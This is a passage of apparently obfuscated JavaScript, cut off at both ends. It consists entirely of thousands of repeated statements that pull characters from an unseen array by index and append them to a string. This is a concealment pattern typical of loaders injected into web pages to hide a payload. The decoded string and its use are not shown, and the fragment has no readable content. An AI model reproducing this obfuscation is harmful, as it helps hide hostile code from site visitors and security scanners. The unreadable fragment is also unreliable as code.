=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[45];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[5];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[34];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[19];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[49];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[71];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[23];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[16];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[53];s=s+b;c=b=d=a[61];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[60];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[61];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[62];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[57];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[10];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[33];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[43];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[52];s=s+b;c=b=d=a[67];s=s+b;c=b=d=a[18];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[28];s=s+b;c=b=d=a[1];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[55];s=s+b;c=b=d=a[73];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[0];s=s+b;c=b=d=a[4];s=s+b;c=b=d=a[11];s=s+b;c=b=d=a[9];s=s+b;c=b=d=a[35];s=s+b;c=b=d=a[58];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[41];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[31];s=s+b;c=b=d=a[40];s=s+b;c=b=d=a[30];s=s+b;c=b=d=a[39];s=s+b;c=b=d=a[13];s=s+b;c=b=d=a[59];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[56];s=s+b;c=b=d=a[3];s=s+b;c=b=d=a[48];s=s+b;c=b=d=a[70];s=s+b;c=b=d=a[44];s=s+b;c=b=d=a[2];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[46];s=s+b;c=b=d=a[68];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[17];s=s+b;c=b=d=a[74];s=s+b;c=b=d=a[64];s=s+b;c=b=d=a[50];s=s+b;c=b=d=a[34];s=s+b;c=b